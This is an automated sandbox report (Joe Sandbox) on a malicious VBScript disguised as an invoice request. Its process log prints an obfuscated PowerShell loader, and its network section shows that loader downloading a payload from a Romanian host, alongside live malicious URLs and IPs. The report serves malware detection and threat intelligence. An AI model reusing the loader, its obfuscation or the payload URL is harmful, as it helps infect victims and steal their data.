              Source: PING.EXE, 00000002.00000002.1559774709.000001A59FC59000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0311D518 LdrInitializeThunk,LdrInitializeThunk,7_2_0311D518

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_7660.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . 
git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsJump to behavior
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (tactic columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Source | Detection | Scanner | Label
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | 0% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.micro | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
orthoimplantcenter.ro | 188.241.183.45 | true | false | | unknown
gormezl_6777.6777.6777.677e | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://orthoimplantcenter.ro/Bestyret.ocx | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro | powershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB_q | powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://orthoimplantcenter.ro | powershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://orthoimplantcenter.ro | powershell.exe, 00000004.00000002.1684347363.000001DE8B6D1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://wicroft.com | powershell.exe, 00000004.00000002.1710822472.000001DEA2092000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://orthoimplantcenter.ro/Bestyret.ocxXR1lX | powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1684347363.000001DE89951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.241.183.45 | orthoimplantcenter.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538491
Start date and time: 2024-10-21 13:08:39 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@9/9@2/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 54
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8028 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
Time | Type | Description
07:10:16 | API Interceptor | 1x Sleep call for process: wscript.exe modified
07:10:19 | API Interceptor | 89x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.241.183.45 | Wniosek o numer faktury.wsf | malicious | Unknown | silinast.ro/Juglandin.xtp
188.241.183.45 | Prosba o oferte.wsf | malicious | GuLoader | silinast.ro/Kommunikuternes.inf
188.241.183.45 | g 288322.vbs | malicious | GuLoader | silinast.ro/Loveman232.msi

Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | Message_2530136.eml | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | ekte.exe | malicious | FormBook | 199.232.210.172
bg.microsoft.map.fastly.net | https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | http://evriservicescompany.com/ | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | d600758023374f78d58acafbcaf94af66ad203b28e22a.exe | malicious | Quasar | 199.232.214.172
bg.microsoft.map.fastly.net | lvXRlexBnb.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | flX5YA1C09.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | sims-4-updater-v1.3.4.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.PUA.Tool.RemoteControl.20.28594.18180.exe | malicious | RMSRemoteAdmin | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Unknown | 199.232.214.172

Match | Associated Sample Name / URL | Detection | Threat Name | Context
GTSCEGTSCentralEuropeAntelGermanyCZ | x86_64.nn.elf | malicious | Mirai, Okiru | 157.25.111.135
GTSCEGTSCentralEuropeAntelGermanyCZ | SKM_0001810-01-2024-GL-3762.bat | malicious | Remcos, GuLoader | 89.44.138.129
GTSCEGTSCentralEuropeAntelGermanyCZ | arm7.elf | malicious | Unknown | 94.42.225.19
GTSCEGTSCentralEuropeAntelGermanyCZ | spc.elf | malicious | Mirai | 212.38.198.226
GTSCEGTSCentralEuropeAntelGermanyCZ | arm6.elf | malicious | Unknown | 91.120.127.45
GTSCEGTSCentralEuropeAntelGermanyCZ | SKU_0001710-1-2024-SX-3762.bat | malicious | Remcos, GuLoader | 89.44.138.129
GTSCEGTSCentralEuropeAntelGermanyCZ | spc.elf | malicious | Mirai | 94.42.225.51
GTSCEGTSCentralEuropeAntelGermanyCZ | powerpc.elf | malicious | Mirai | 178.183.111.126
GTSCEGTSCentralEuropeAntelGermanyCZ | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 91.139.6.161
GTSCEGTSCentralEuropeAntelGermanyCZ | na.elf | malicious | Mirai | 89.40.18.190

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order.exe | malicious | GuLoader, Snake Keylogger | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | Spedizione.vbs | malicious | Unknown | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | FACTURA DE PAGO.exe | malicious | GuLoader, Snake Keylogger | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | PAGO FRAS. AGOSTO 2024..exe | malicious | GuLoader, Snake Keylogger | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9 | malicious | Unknown | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | Documenti di spedizione.bat.exe | malicious | AgentTesla, GuLoader | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | RFQ-KTE-07102024.pdf.scr | malicious | Snake Keylogger, VIP Keylogger | 188.241.183.45
3b5074b1b5d032e5620f69f9f700ff0e | rRFQ24201007_pdf.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.241.183.45

No context

Process: C:\Windows\System32\wscript.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
Reputation: high, very likely benign file

Process: C:\Windows\System32\wscript.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.2478978672539016
Encrypted: false
SSDEEP: 6:kKo9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rDImsLNkPlE99SNxAhUe/3
MD5: 3DF415CD8E6C7ECDF7EEF0DC5EBE89E4
SHA1: 69F96340399974E7E47A8ED8855CCED237025F03
SHA-256: CD5B06D3A93BD7C1349CB4F7E7620C0EB9748588BB93B2F69CC66011E3C02040
SHA-512: 8C7683792C421187B47D2BBA58CBD304B5C54B9D70B0AFEA9CCB93CF7DBC29D0353F47C70FA32D95920A033E26EA8CC1EC886A7EA1CA506B77B8D7A1EB61A1F1
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5: 106D01F562D751E62B702803895E93E0
SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious: false
Reputation: moderate, very likely benign file

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1628158735648508
Encrypted: false
SSDEEP: 3:Nlllul5mxllp:NllU4x/
MD5: 3A925CB766CE4286E251C26E90B55CE8
SHA1: 3FA8EE6E901101A4661723B94D6C9309E281BD28
SHA-256: 4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
SHA-512: F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):487916
                                    Entropy (8bit):5.8746795421987645
                                    Encrypted:false
                                    SSDEEP:12288:zw60IEKztCkdDmbaUuBvz+/zDJBa6Nmpar20lbGZt:EjIzfmbatN0862yot
                                    MD5:E6A89DB6F68E95849840380F6B94B795
                                    SHA1:85CA246A7EBCD215510A1FD2EE90CCB3B3F0F9CF
                                    SHA-256:7D5E33F6279338D1377C18681827444CCF5CF983B0C812165807B414F2BFCCD4
                                    SHA-512:A12DB4243B28747EE8A3259A7AC87D1E3C9CACBB610684E314033DB0F06EE6F2A4010342A23FE32FA43CA0CDE8A7D534B98060221C2D60D5047AF2D3F1578C3E
                                    Malicious:false
                                    Preview:
                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.293746378989499
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
                                    File size:28'924 bytes
                                    MD5:74bea39444aaab616939adfb22141173
                                    SHA1:68146894fedfe6a2c68fdbecfc6b26ce98c164e8
                                    SHA256:116129cfa708ab230b404febfa3a41c86c226849d41dde4120372d38c527be2d
                                    SHA512:20d12f32ce71cc58489917d413da96a0e4ba316d630160772611389876e441bb9ead06caff63d9efacb6dd38fd9e4d78fdedd82583b0b06798d7719c54ecb633
                                    SSDEEP:384:XrCibQg08pySoh9+OWF9W/JA1VCIDeD7vzzbfWzld9KJvi9:XeUQzb2GebDeXvzzbfWz39669
                                    TLSH:AFD23B3C48020FE81B4737B1064F2C20967966B3433D486C64D9A9E978ADB4A7D676FE
                                    File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                    Icon Hash:68d69b8f86ab9a86
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Oct 21, 2024 13:10:18.011255980 CEST | 62082 | 53 | 192.168.2.11 | 1.1.1.1
                                    Oct 21, 2024 13:10:18.021697044 CEST | 53 | 62082 | 1.1.1.1 | 192.168.2.11
                                    Oct 21, 2024 13:10:20.871748924 CEST | 53589 | 53 | 192.168.2.11 | 1.1.1.1
                                    Oct 21, 2024 13:10:20.941668987 CEST | 53 | 53589 | 1.1.1.1 | 192.168.2.11
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Oct 21, 2024 13:10:18.011255980 CEST | 192.168.2.11 | 1.1.1.1 | 0x9b59 | Standard query (0) | gormezl_6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
                                    Oct 21, 2024 13:10:20.871748924 CEST | 192.168.2.11 | 1.1.1.1 | 0x5ab2 | Standard query (0) | orthoimplantcenter.ro | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Oct 21, 2024 13:10:16.594485044 CEST | 1.1.1.1 | 192.168.2.11 | 0x53e1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                    Oct 21, 2024 13:10:16.594485044 CEST | 1.1.1.1 | 192.168.2.11 | 0x53e1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                    Oct 21, 2024 13:10:18.021697044 CEST | 1.1.1.1 | 192.168.2.11 | 0x9b59 | Name error (3) | gormezl_6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
                                    Oct 21, 2024 13:10:20.941668987 CEST | 1.1.1.1 | 192.168.2.11 | 0x5ab2 | No error (0) | orthoimplantcenter.ro | | 188.241.183.45 | A (IP address) | IN (0x0001) | false
                                    • orthoimplantcenter.ro
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.11 | 49706 | 188.241.183.45 | 443 | 7660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-10-21 11:10:21 UTC | 177 | OUT | GET /Bestyret.ocx HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: orthoimplantcenter.ro
                                    Connection: Keep-Alive
                                    2024-10-21 11:10:22 UTC | 209 | IN | HTTP/1.1 200 OK
                                    Date: Mon, 21 Oct 2024 11:10:22 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Last-Modified: Mon, 21 Oct 2024 07:16:44 GMT
                                    Accept-Ranges: bytes
                                    Content-Length: 487916


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:1
                                    Start time:07:10:15
                                    Start date:21/10/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
